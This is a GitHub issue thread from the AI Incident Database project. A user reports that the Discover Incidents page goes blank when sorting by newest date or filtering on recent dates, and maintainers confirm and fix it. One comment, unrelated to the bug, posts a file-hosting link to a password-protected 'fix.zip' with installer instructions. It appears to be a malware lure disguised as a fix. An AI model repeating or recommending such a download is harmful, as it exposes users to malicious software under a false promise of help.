### ISSUE TITLE
Blank Discover Incidents page when filtering

### ISSUE THREAD

**Issue by mh2171** [responsible-ai-collaborative/aiid#3040]
Hi all, 

I want to view the latest incidents in AIID, so I'm trying to sort incidents by date on the Discover Incidents page. But whenever I click on Sort By > Newest Incident Date the page goes blank. This doesn't happen when sorting by Oldest Incident Date. 

The page also goes blank when sorting by
- Newest Published Date
- Newest Submitted Date
Or when filtering by Date and choosing the last 2 months (e.g. July 2024 - August 2024). After playing around a bit I find it goes blank as soon as I choose any date post-2022 as the From Date (leaving To Date unchanged). 

I'm using Chrome but the issue also occurs when using Safari. 

Wanted to flag in case you are not yet aware of this.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kepae** [comment]
Thanks @mh2171 ! @cesarvarela for triage -- related to https://github.com/responsible-ai-collaborative/aiid/issues/3035 ?

**Comment by cesarvarela** [comment]
Confirmed. 

@kepae Seems so, yes, deploying.

**Comment by cesarvarela** [comment]
Fixed
